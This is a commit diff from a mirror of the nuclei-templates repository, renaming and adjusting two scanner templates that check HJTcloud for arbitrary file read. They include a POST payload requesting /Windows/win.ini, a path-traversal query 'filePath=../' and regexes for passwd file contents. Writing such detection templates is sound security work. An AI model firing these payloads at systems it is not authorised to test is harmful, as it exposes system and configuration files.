daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

misc changes

patch-1
sandeep 2021-05-31 14:19:23 +05:30
parent 97195bf33c
commit 2ad903dcf1
2 changed files with 12 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml
View File

@ -27,19 +27,16 @@ requests:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/Windows/win.ini
fullPath=/Windows/win.ini
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
words:
- "extensions"
part: body
- "root:[x*]:0:0:"
- "bit app support"
condition: or
- type: status
status:

13
exposures/configs/hjtcloud-information-disclosure.yaml → vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml
View File

@ -1,24 +1,27 @@
id: hjtcloud-information-disclosure
id: hjtcloud-arbitrary-file-read
info:
name: HJTcloud Information Disclosure
name: HJTcloud Arbitrary file read
author: pikpikcu
severity: low
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
tags: hjtcloud,exposure,config
tags: hjtcloud,lfi
requests:
- method: GET
path:
- "{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../"
- "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"
matchers-condition: and
matchers:
- type: word
words:
- "/var/logs/../logs/"
- "name"
- "length"
- "filePath"
condition: and
- type: status
status: